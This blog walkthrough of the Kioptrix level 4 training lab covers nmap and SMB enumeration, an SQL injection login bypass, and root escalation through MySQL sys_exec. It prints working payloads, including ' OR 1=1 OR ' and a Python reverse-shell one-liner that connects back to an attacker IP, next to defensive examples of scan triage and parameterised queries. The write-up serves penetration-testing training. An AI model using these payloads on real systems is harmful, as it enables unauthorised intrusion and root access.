
Sunday, August 8, 2021

KIOPTRIX SERIES PENTEST : Walkthrough level [IV]

 

KIOPTRIX LAB LEVEL [IV]



You can find the complete penetration testing process for this machine in the following video:








Complete written walkthrough of the same content:

RECONNAISSANCE PHASE:

NETWORK DISCOVERY:

We can use a couple of tools for this task. One of them is arp-scan, which sends ARP requests in broadcast mode and waits for the hosts to answer over the same protocol, as you can see below:




The other tool is netdiscover, which works on the same principle but takes the network interface as a parameter:





NMAP:

In this step, from the attacker machine we gather information about the open ports and services of our target machine. We can use some options to run scripts and obtain information about vulnerabilities on the remote host.

nmap -sC -sV -T4 -n 192.168.1.54 -v
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-11 19:25 CEST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:25
Completed NSE at 19:25, 0.00s elapsed
Initiating NSE at 19:25
Completed NSE at 19:25, 0.00s elapsed
Initiating NSE at 19:25
Completed NSE at 19:25, 0.00s elapsed
Initiating ARP Ping Scan at 19:25
Scanning 192.168.1.54 [1 port]
Completed ARP Ping Scan at 19:25, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:25
Scanning 192.168.1.54 [1000 ports]
Discovered open port 80/tcp on 192.168.1.54
Discovered open port 22/tcp on 192.168.1.54
Discovered open port 139/tcp on 192.168.1.54
Discovered open port 445/tcp on 192.168.1.54
Completed SYN Stealth Scan at 19:25, 3.31s elapsed (1000 total ports)
Initiating Service scan at 19:25
Scanning 4 services on 192.168.1.54
Completed Service scan at 19:26, 11.02s elapsed (4 services on 1 host)
NSE: Script scanning 192.168.1.54.
Initiating NSE at 19:26
Completed NSE at 19:26, 15.12s elapsed
Initiating NSE at 19:26
Completed NSE at 19:26, 0.01s elapsed
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
Nmap scan report for 192.168.1.54
Host is up (0.00054s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 40:EC:99:C9:FC:2F (Intel Corporate)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 4h00m00s, deviation: 2h49m42s, median: 2h00m00s
| nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX4<00>        Flags: <unique><active>
|   KIOPTRIX4<03>        Flags: <unique><active>
|   KIOPTRIX4<20>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|_  WORKGROUP<00>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2021-08-11T15:26:11-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

NSE: Script Post-scanning.
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap

    
The conclusion of the nmap scan is that we found the following open ports and services:

cat target_nmap | grep open
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)

The following script enumerates the users of the Samba service, which probably also belong to the operating system:

nmap --script=smb-enum-users 192.168.1.54
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-11 19:57 CEST
Nmap scan report for 192.168.1.54
Host is up (0.0012s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 40:EC:99:C9:FC:2F (Intel Corporate)

Host script results:
| smb-enum-users: 
|   KIOPTRIX4\john (RID: 3002)
|     Full name:   ,,,
|     Flags:       Normal user account
|   KIOPTRIX4\loneferret (RID: 3000)
|     Full name:   loneferret,,,
|     Flags:       Normal user account
|   KIOPTRIX4\nobody (RID: 501)
|     Full name:   nobody
|     Flags:       Normal user account
|   KIOPTRIX4\robert (RID: 3004)
|     Full name:   ,,,
|     Flags:       Normal user account
|   KIOPTRIX4\root (RID: 1000)
|     Full name:   root
|_    Flags:       Normal user account

Nmap done: 1 IP address (1 host up) scanned in 3.40 seconds
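When the same scans are repeated across several hosts it helps to turn the raw nmap text into structured data and let a script flag the points that matter for hardening. The following parser is an added example and is not part of the original walkthrough; it reads nmap's normal output as reproduced above (the sample text is a constructed, trimmed copy of the two runs on this page), collects the open ports and the accounts listed by smb-enum-users, and emits defender-oriented findings such as disabled SMB signing and user enumeration over a guest session. The finding texts and the suggested smb.conf setting are my own wording, not something the scan itself outputs.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: a trimmed copy of the two nmap runs shown above.
SAMPLE_NMAP = """\
Nmap scan report for 192.168.1.54
Host is up (0.00054s latency).
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|_  message_signing: disabled (dangerous, but default)
| smb-enum-users:
|   KIOPTRIX4\\john (RID: 3002)
|     Full name:   ,,,
|     Flags:       Normal user account
|   KIOPTRIX4\\loneferret (RID: 3000)
|     Full name:   loneferret,,,
|     Flags:       Normal user account
|   KIOPTRIX4\\robert (RID: 3004)
|     Full name:   ,,,
|     Flags:       Normal user account
|   KIOPTRIX4\\root (RID: 1000)
|     Full name:   root
|_    Flags:       Normal user account
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
USER_RE = re.compile(r"^\|\s+([^\\\s]+)\\(\S+)\s+\(RID:\s*(\d+)\)")
SIGNING_RE = re.compile(r"message_signing:\s*(\w+)")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str


@dataclass
class ScanSummary:
    target: str = ""
    ports: list = field(default_factory=list)
    smb_users: list = field(default_factory=list)  # (domain, name, rid)
    smb_signing: str = "unknown"


def parse_nmap(text: str) -> ScanSummary:
    """Walk nmap's normal output line by line and collect what we need."""
    summary = ScanSummary()
    in_users = False
    for line in text.splitlines():
        line = line.rstrip()
        m = re.match(r"^Nmap scan report for (\S+)", line)
        if m:
            summary.target = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m:
            summary.ports.append(Port(int(m.group(1)), m.group(2), m.group(3),
                                      m.group(4), m.group(5).strip()))
            continue
        m = SIGNING_RE.search(line)
        if m:
            summary.smb_signing = m.group(1)
            continue
        # "| name:" opens a script block; "|   ..." lines belong to it.
        if line.startswith("| ") and not line.startswith("|  "):
            in_users = line.startswith("| smb-enum-users")
            continue
        if in_users:
            m = USER_RE.match(line)
            if m:
                summary.smb_users.append((m.group(1), m.group(2), int(m.group(3))))
    return summary


def triage(summary: ScanSummary) -> list:
    """Turn the parsed data into defender-oriented findings."""
    findings = []
    open_ports = [p for p in summary.ports if p.state == "open"]
    if open_ports:
        findings.append("exposed services: " + ", ".join(
            f"{p.number}/{p.proto} {p.service} ({p.version})" for p in open_ports))
    if summary.smb_signing == "disabled":
        findings.append("SMB signing disabled: set 'server signing = mandatory' in smb.conf")
    if summary.smb_users:
        names = ", ".join(u[1] for u in summary.smb_users)
        findings.append(f"{len(summary.smb_users)} accounts enumerable over a guest SMB session "
                        f"({names}): restrict null sessions and guest access")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_nmap(SAMPLE_NMAP)):
        print("-", finding)
```

Feed it the output of `nmap -sC -sV ... -oN target_nmap` instead of the embedded sample to use it on a real scan; the same parser works for any host because it keys on nmap's fixed line layout rather than on the values.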


EXPLOITATION:

In the exploitation phase we check every open service and its version on the victim machine.

22: ssh


The service is up and works as expected, but we do not have a user and credentials to log in.

80: http



On the http service we found a web page hosted on the server. In the following lines we review the usual process for exploiting a web page manually, without automated tools:

1. Server recognition:

whatweb http://192.168.1.54
http://192.168.1.54 [200 OK] Apache[2.2.8], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch], IP[192.168.1.54], PHP[5.2.4-2ubuntu5.6][Suhosin-Patch], PasswordField[mypassword], X-Powered-By[PHP/5.2.4-2ubuntu5.6]

2. Crawling for common directories:



There is useful information about the application users: john and robert.
The login is validated in a PHP file that accepts two parameters via the POST method, myusername/mypassword.





3. Reviewing common vulnerabilities and misconfiguration detected:

nikto -host 192.168.1.54
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.54
+ Target Hostname:    192.168.1.54
+ Target Port:        80
+ Start Time:         2021-08-11 20:06:50 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: Tue Aug 28 12:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 8724 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2021-08-11 20:07:30 (GMT2) (40 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

4. Exploiting the login:

myusername: john
mypassword: '


The disclosed error message says "found an error on mysql_num_rows()".


myusername: john
mypassword: ' OR 1=1 OR '


Why? Because the PHP code is vulnerable to SQL injection and could look like this on the server side (the real checklogin.php uses the legacy mysql_* functions, as the leaked mysql_num_rows() error shows; the shape of the query is the same):

$sql = "SELECT * FROM users WHERE username='" . $_POST['username'] . "' AND password='" . $_POST['password'] . "';";
$result = mysqli_query($link, $sql);
if (mysqli_num_rows($result) > 0) {
    // User is authenticated...
} else {
    // User not found
}

In this case, with our injection, the query sent to the database becomes:

SELECT * FROM users WHERE username='john' AND password='' OR 1 =1 OR ''; 

Local PoC:

mysql> create database db_injection;
Query OK, 1 row affected (0,01 sec)

mysql> use db_injection;
Database changed

mysql> CREATE TABLE IF NOT EXISTS users (
    ->     usr_id INT AUTO_INCREMENT PRIMARY KEY,
    ->     user VARCHAR(20) NOT NULL,
    ->     password varchar(20) NOT NULL
    -> );
Query OK, 0 rows affected (0,01 sec)

mysql> insert into users values (null,'robert','Mycredentials');
Query OK, 1 row affected (0,02 sec)

mysql> insert into users values (null,'f0ns1','Mycredentials');
Query OK, 1 row affected (0,01 sec)

mysql> insert into users values (null,'jhon','Mycredentials');
Query OK, 1 row affected (0,02 sec)


mysql> select * from users;
+--------+--------+---------------+
| usr_id | user   | password      |
+--------+--------+---------------+
|      1 | robert | Mycredentials |
|      2 | f0ns1  | Mycredentials |
|      3 | jhon   | Mycredentials |
+--------+--------+---------------+
3 rows in set (0,01 sec)

And finally the injection. The result set has more than 0 rows:

SELECT * FROM users WHERE user='jhon' AND password='' OR 1 =1 OR ''; 
+--------+--------+---------------+
| usr_id | user   | password      |
+--------+--------+---------------+
|      1 | robert | Mycredentials |
|      2 | f0ns1  | Mycredentials |
|      3 | jhon   | Mycredentials |
+--------+--------+---------------+
3 rows in set (0,00 sec)
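The local PoC above shows the injected query returning every row; the usual fix is to stop building the statement from strings and bind the user input as parameters. The following is an added example, not the walkthrough author's code and not the code running on the Kioptrix box: it uses Python's sqlite3 instead of MySQL so it runs offline, builds the same users table as the PoC (constructed rows), and puts the concatenated query beside a parameterised one so the two behaviours can be compared with the exact payloads used on this page (a lone quote, then ' OR 1=1 OR ').

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed copy of the PoC table: three users, same values as above."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users ("
        " usr_id INTEGER PRIMARY KEY AUTOINCREMENT,"
        " user TEXT NOT NULL,"
        " password TEXT NOT NULL)"
    )
    con.executemany(
        "INSERT INTO users (user, password) VALUES (?, ?)",
        [("robert", "Mycredentials"), ("f0ns1", "Mycredentials"), ("jhon", "Mycredentials")],
    )
    return con


def vulnerable_login(con: sqlite3.Connection, username: str, password: str) -> tuple:
    """Mirrors the concatenated query on the page: user input becomes SQL."""
    sql = ("SELECT * FROM users WHERE user='" + username
           + "' AND password='" + password + "'")
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        # A lone quote breaks the statement. The Kioptrix app leaks this as
        # an error about mysql_num_rows(); here we return it to the caller.
        return ("error", str(exc))
    return ("ok", len(rows))


def safe_login(con: sqlite3.Connection, username: str, password: str) -> tuple:
    """Parameterised query: the driver sends the values apart from the SQL,
    so quotes and OR clauses inside them are just characters to compare."""
    rows = con.execute(
        "SELECT * FROM users WHERE user=? AND password=?",
        (username, password),
    ).fetchall()
    return ("ok", len(rows))


def authenticated(result: tuple) -> bool:
    """Same decision rule as the page's snippet: any row means logged in."""
    return result[0] == "ok" and result[1] > 0


if __name__ == "__main__":
    con = make_db()
    payload = "' OR 1=1 OR '"
    print("vulnerable, quote only :", vulnerable_login(con, "john", "'"))
    print("vulnerable, injection  :", vulnerable_login(con, "john", payload))
    print("parameterised, injection:", safe_login(con, "john", payload))
    print("parameterised, real creds:", safe_login(con, "robert", "Mycredentials"))
```

With the concatenated query the payload turns the WHERE clause into (user='john' AND password='') OR 1=1 OR '', which is true for every row, so the application sees three rows and logs the attacker in as the first match. With placeholders the same string is compared literally against the password column and no row matches. In PHP the equivalent is mysqli_prepare() with bind_param(), and the stored passwords should be hashed (password_hash()/password_verify()) rather than compared in the query at all.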

Obtaining the credentials for robert:

myusername: robert
mypassword: ' OR 1=1 OR '

 

5. Obtaining a session on server:

Using the SSH service with the account and credentials obtained above, we can access the target host. But....


As you can see in the previous image, this is a restricted shell.
When you type help, the shell lists the binaries you are allowed to execute.

robert:~$ help
cd  clear  echo  exit  help  ll  lpath  ls

How to bypass the restricted shell:



Privilege Escalation:

1. Obtaining information from the PHP code:

robert@Kioptrix4:/var/www$ cat checklogin.php | grep Mysql   
$username="root"; // Mysql username
$password=""; // Mysql password
// Mysql_num_row is counting table row





2. Spawning a reverse shell with root permissions from MySQL:

2.1. MySQL connection as the root user from localhost:

mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 16
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema | 
| members            | 
| mysql              | 
+--------------------+
3 rows in set (0.00 sec)

mysql> use members;

2.2. Executing commands on the operating system with root privileges:
The following command spawns a reverse shell with python on its own:

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.42",8989));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Using the sys_exec plugin function:
mysql> select sys_exec('ls');
+----------------+
| sys_exec('ls') |
+----------------+
| NULL           | 
+----------------+
1 row in set (0.00 sec)

Using the plugin with the command:

mysql> select sys_exec("python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.42\",8989));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'");


3. Listen on port 8989 on the attacker machine:



This execution runs with administrative rights because the sys_exec plugin function is enabled and the MySQL server runs with root permissions.



OS dynamic library permissions:




And that is all for this lab level. I hope you enjoy the Kioptrix series;
follow my blog [https://roadtooscp-f0ns1.blogspot.com/] and we'll keep in touch.

with kind regards, f0ns1

